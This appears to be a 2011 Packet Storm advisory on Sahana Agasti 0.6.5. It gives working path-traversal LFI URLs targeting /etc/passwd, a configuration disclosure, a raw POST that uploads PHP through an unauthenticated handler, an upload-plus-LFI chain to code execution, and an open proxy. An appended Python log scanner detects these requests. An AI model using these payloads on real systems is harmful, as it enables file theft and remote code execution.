Sahana Agasti 0.6.5 Local File Inclusion / Shell Upload

08 Jan 2011 00:00:00 | Reported by dun | Type: packetstorm | Source: packetstormsecurity.com

Sahana Agasti 0.6.5 Local File Inclusion Vulnerabilities

:::::::-. ... ::::::. :::.  
;;, `';, ;; ;;;`;;;;, `;;;  
`[[ [[[[' [[[ [[[[[. '[[  
$$, $$$$ $$$ $$$ "Y$c$$  
888_,o8P'88 .d888 888 Y88  
MMMMP"` "YmmMMMM"" MMM YM  
  
[ Discovered by dun \ posdub[at]gmail.com ]  
[ dun / 2011-01-07 ]  
#############################################################  
# [ Sahana Agasti <= 0.6.5 ] Multiple Vulnerabilities #  
#############################################################  
#  
# Script: "Agasti is the PHP based project of the Sahana Software Foundation.  
# Based a long-term preparedness for disaster management..."  
#  
# Script site: http://www.sahanafoundation.org/  
# Download: https://launchpad.net/sahana-agasti/  
#  
  
[LFI] Vuln: ( Scenario 1)  
http://site.com/sahana-0.6.5/www/stream.php?stream_type=/../../../../../../../../../etc/passwd%00  
File: ./sahana-0.6.5/www/stream.php  
  
20 $global['approot'] = realpath(dirname(__FILE__)).'/../';  
21 // $global['approot'] = '/usr/local/bin/sahana/';  
22 $global['previous']=false;  
...(CUT)...  
39 if(!$global['previous']){  
40 $global['action'] = (NULL == $_REQUEST['act']) ?  
41 "default" : $_REQUEST['act'];  
42 $global['module'] = (NULL == $_REQUEST['mod']) ?  
43 "home" : $_REQUEST['mod'];  
44 }  
45 $global['stream_type'] = $_GET['stream_type']; // [1]  
...(CUT)...  
52 shn_front_controller();  
...(CUT)...  
64 function shn_front_controller()  
65 {  
66 global $global;  
67 global $conf;  
68 $approot = $global['approot'];  
69 $action = $global['action'];  
70 $module = $global['module'];   
...(CUT)...   
90 if($global['stream_type'] && file_exists($approot.'/inc/lib_st_'.$global['stream_type'].'.inc') ){// [2]  
91 require_once ($approot.'/inc/lib_st_'.$global['stream_type'].'.inc'); // [3] LFI  
92 if(file_exists($approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc'))  
93 $default_file = $approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc';  
94 else  
95 $default_file = 'stream.inc';  
96 }   
  
  
In this scenario the script tries to include something like this:  
/var/www/apache/sahana/www/..//inc/lib_st_/../../../../../../../../../etc/passwd\0.inc  
  
################################################################################################################################  
  
[LFI] Vuln: ( Scenario 2)  
http://site.com/sahana-0.6.5/www/stream.php?mod=/../../../../../../../../../etc/passwd%00  
File: ./sahana-0.6.5/www/stream.php  
42 $global['module'] = (NULL == $_REQUEST['mod']) ?  
43 "home" : $_REQUEST['mod'];  
...(CUT)...   
70 $module = $global['module'];   
...(CUT)...   
90 if($global['stream_type'] && file_exists($approot.'/inc/lib_st_'.$global['stream_type'].'.inc') ){  
91 require_once ($approot.'/inc/lib_st_'.$global['stream_type'].'.inc');  
92 if(file_exists($approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc'))  
93 $default_file = $approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc';  
94 else  
95 $default_file = 'stream.inc';  
96 }else  
97 $default_file = 'main.inc'; // [1]  
98   
99 // include the correct module file based on action and module  
100 $module_file = $approot.'mod/'.$module.'/'.$default_file; // [2]  
101 if (! file_exists($module_file)) { //  
102 $module_file = $approot.'mod/home/'.$default_file;  
103 }  
...(CUT)...   
109 //Include the module file  
110 include($module_file); // [3] LFI  
  
In this scenario the script tries to include something like this:  
/var/www/apache/sahana/www/../mod//../../../../../../../../../etc/passwd\0/main.inc  
  
################################################################################################################################  
  
[LFI] Vuln: ( Scenario 3 without file_exists)  
http://site.com/sahana-0.6.5/www/stream.php?act=adm&mod=/../../../../../../../../../etc/passwd%00  
File: ./sahana-0.6.5/www/stream.php  
  
42 $global['module'] = (NULL == $_REQUEST['mod']) ? // [1]  
43 "home" : $_REQUEST['mod'];  
...(CUT)...   
84 if (preg_match('/^adm/',$action)) { //  
85 $module = 'admin'; // [2]  
86 $action = 'modadmin'; //  
87 }  
...(CUT)...   
96 }else  
97 $default_file = 'main.inc'; // [3]  
98   
99 // include the correct module file based on action and module  
100 $module_file = $approot.'mod/'.$module.'/'.$default_file; // [4] ( /var/www/apache/sahana/www/../mod/admin/main.inc )  
...(CUT)...  
110 include($module_file); // [5]  
...(CUT)...   
125 $module_function = 'shn_'.$module.'_'.$action; // [6]  
126 if (!function_exists($module_function)) { //  
127 $module_function='shn_'.$module.'_default';  
128 }  
129 $_SESSION['last_module']=$module;  
130 $_SESSION['last_action']=$action;  
131 $output = $module_function(); // [7] ( shn_admin_modadmin() )  
  
File: ./sahana-0.6.5/mod/admin/main.inc  
  
161 function shn_admin_modadmin()  
162 {  
163 global $global;  
164   
165 // include original module admin section  
166 include $global['approot']."/mod/".$global['module']."/admin.inc"; // [8] LFI  
  
In this scenario the script tries to include something like this:  
/var/www/apache/sahana/www/..//mod//../../../../../../../../../etc/passwd\0/admin.inc  
  
################################################################################################################################  
  
[Configuration disclosure] Vuln:  
http://site.com/sahana-0.6.5/www/stream.php?mod=admin&act=conf_list  
File: ./sahana-0.6.5/www/stream.php  
  
100 $module_file = $approot.'mod/'.$module.'/'.$default_file; // [1] ( /var/www/apache/sahana/www/../mod/admin/main.inc )   
...(CUT)...   
110 include($module_file); // [2]  
...(CUT)...   
125 $module_function = 'shn_'.$module.'_'.$action; // [3]  
126 if (!function_exists($module_function)) {  
127 $module_function='shn_'.$module.'_default';  
128 }  
129 $_SESSION['last_module']=$module;  
130 $_SESSION['last_action']=$action;  
131 $output = $module_function(); // [4] ( shn_admin_conf_list() )  
  
File: ./sahana-0.6.5/mod/admin/main.inc   
31 include_once $global['approot']."mod/admin/conf_admin.inc"; // [5]  
  
File: ./sahana-0.6.5/mod/admin/conf_admin.inc  
22 function shn_admin_conf_list() // [6] Configuration disclosure  
...(CUT)...   
  
We can control the function name through the GET variables (mod, act).  
We can call any of the prepared functions with the "shn_" prefix, bypassing the admin privilege check.  
So let's see what comes next..  
  
################################################################################################################################  
  
[Arbitrary File Upload] Vuln:  
http://site.com/sahana-0.6.5/www/stream.php?mod=admin&act=lc_file_browser  
File: ./sahana-0.6.5/www/stream.php  
  
131 $output = $module_function(); // [1] ( shn_admin_lc_file_browser() )  
  
File: ./sahana-0.6.5/mod/admin/main.inc   
  
683 function shn_admin_lc_file_browser() // [2] Arbitrary File Upload  
684 {  
685 global $global;  
686 $locale = $_POST['locale'];  
687 //$file_type=$_POST['file_type'];  
688 $uploaddir = "../res/locale/$locale/LC_MESSAGES/";  
689 //"../res/locale/$locale/LC_MESSAGES/";  
690 //echo $uploaddir;  
691 $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);  
692   
693 if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {  
694 add_confirmation('File uploaded sucessfully');  
695 }else {  
696 add_error('File uploaded failed');  
697 }  
698   
699 }  
  
We can upload a file to /res/locale/$locale/LC_MESSAGES/ (the default $locale is my_MM)  
using a crafted POST request.  
Example:  
  
POST /sahana-0.6.5/www/stream.php?mod=admin&act=lc_file_browser HTTP/1.1  
Host: site.com  
User-Agent: Mozilla/5.0 Gecko/20101203 Firefox/3.6.13  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: pl,en-us;q=0.7,en;q=0.3  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 115  
Connection: keep-alive  
Content-Type: multipart/form-data; boundary=---------------------------11682257938924  
Content-Length: 420  
-----------------------------11682257938924  
Content-Disposition: form-data; name="MAX_FILE_SIZE"  
  
50000  
-----------------------------11682257938924  
Content-Disposition: form-data; name="userfile"; filename="file.txt"  
Content-Type: text/plain  
  
<?php phpinfo(); ?>  
-----------------------------11682257938924  
Content-Disposition: form-data; name="locale"  
  
my_MM  
-----------------------------11682257938924--  
  
The file /res/locale/my_MM/LC_MESSAGES/file.txt is created.  
We can use the filename main.inc instead of file.txt.  
So let's go back to the LFI ( scenarios 1 and 2 ):  
( scenario 1 ) http://site.com/sahana-0.6.5/www/stream.php?stream_type=/../../res/locale/my_MM/LC_MESSAGES/main  
( scenario 2 ) http://site.com/sahana-0.6.5/www/stream.php?mod=/..//res/locale/my_MM/LC_MESSAGES/  
It includes LC_MESSAGES/main.inc with our <?php phpinfo(); ?> (AFU+LFI=RCE)  
  
################################################################################################################################  
  
[PHP Proxy]  
http://site.com/sahana-0.6.5/www/res/lib_proxy.php?url=http://site2.com/dupa.php  
File: ./sahana-0.6.5/www/res/lib_proxy.php  
  
17 $url = $_GET['url'];  
18 $parseurl = urldecode($url);  
19  
20 // open cURL session  
21 $ch = curl_init();  
22 curl_setopt($ch, CURLOPT_POST,1);  
23 curl_setopt($ch, CURLOPT_URL,$parseurl);  
24 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);  
25 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);  
26 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  
27  
28 $xml = curl_exec($ch);  
29 curl_close($ch);  
30  
31 header("Content-Type: text/xml");  
32  
33 echo $xml;  
  
################################################################################################################################  
And possibly other bugs...  
################################################################################################################################  
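Detection logic for the request patterns documented above, added here as an example and not part of dun's advisory or of the Sahana code base: it scans constructed common-log-format lines and flags stream.php requests whose mod/act/stream_type values are not bare identifiers (the traversal and %00 cases of scenarios 1 to 3), POSTs to the lc_file_browser upload handler, and any request to lib_proxy.php with a url parameter.

```python
import re
from urllib.parse import urlsplit, parse_qs

# stream.php splices mod, act and stream_type straight into include paths
# ('/inc/lib_st_'.$stream_type.'.inc', 'mod/'.$module.'/'...), so a benign
# value is a bare identifier; anything else is a traversal attempt.
IDENT = re.compile(r"^[A-Za-z0-9_]+$")
PATH_PARAMS = ("mod", "act", "stream_type")
ADMIN_FILE_ACTIONS = {"lc_file_browser"}   # unauthenticated upload handler
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+"')

# Constructed log lines (not from the advisory): 10.0.0.9 walks through the
# advisory's scenarios, 10.0.0.5 is an ordinary visitor.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Jan/2011:10:01:12 +0000] "GET /sahana-0.6.5/www/stream.php?mod=home&act=default HTTP/1.1" 200 5120
10.0.0.9 - - [08/Jan/2011:10:02:40 +0000] "GET /sahana-0.6.5/www/stream.php?stream_type=/../../../../etc/passwd%00 HTTP/1.1" 200 1843
10.0.0.9 - - [08/Jan/2011:10:03:02 +0000] "GET /sahana-0.6.5/www/stream.php?act=adm&mod=/../../../../etc/passwd%00 HTTP/1.1" 200 1843
10.0.0.9 - - [08/Jan/2011:10:03:30 +0000] "POST /sahana-0.6.5/www/stream.php?mod=admin&act=lc_file_browser HTTP/1.1" 200 311
10.0.0.9 - - [08/Jan/2011:10:03:55 +0000] "GET /sahana-0.6.5/www/stream.php?stream_type=/../../res/locale/my_MM/LC_MESSAGES/main HTTP/1.1" 200 90211
10.0.0.9 - - [08/Jan/2011:10:04:10 +0000] "GET /sahana-0.6.5/www/res/lib_proxy.php?url=http://site2.com/x.php HTTP/1.1" 200 77
"""

def analyze_request(method, url):
    """Return the names of the rules one request line triggers (empty if benign)."""
    findings = []
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1]
    qs = parse_qs(parts.query, keep_blank_values=True)   # %00 arrives here as "\x00"
    if script == "stream.php":
        for name in PATH_PARAMS:
            if any(not IDENT.match(v) for v in qs.get(name, [])):
                findings.append("lfi:" + name)
        mod = qs.get("mod", [""])[0]
        act = qs.get("act", [""])[0]
        if method == "POST" and mod == "admin" and act in ADMIN_FILE_ACTIONS:
            findings.append("admin-upload")
    elif script == "lib_proxy.php" and "url" in qs:
        findings.append("open-proxy")   # lib_proxy.php fetches any caller-supplied URL
    return findings

def scan_log(text):
    """Return (client_ip, request_url, findings) for every flagged access-log line."""
    hits = []
    for m in filter(None, map(LOG_RE.match, text.splitlines())):
        ip, method, url = m.groups()
        findings = analyze_request(method, url)
        if findings:
            hits.append((ip, url, findings))
    return hits
```

Running `scan_log(SAMPLE_LOG)` flags the five 10.0.0.9 lines and leaves the ordinary mod=home request alone; the same rules apply unchanged to a real access log read from disk.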
  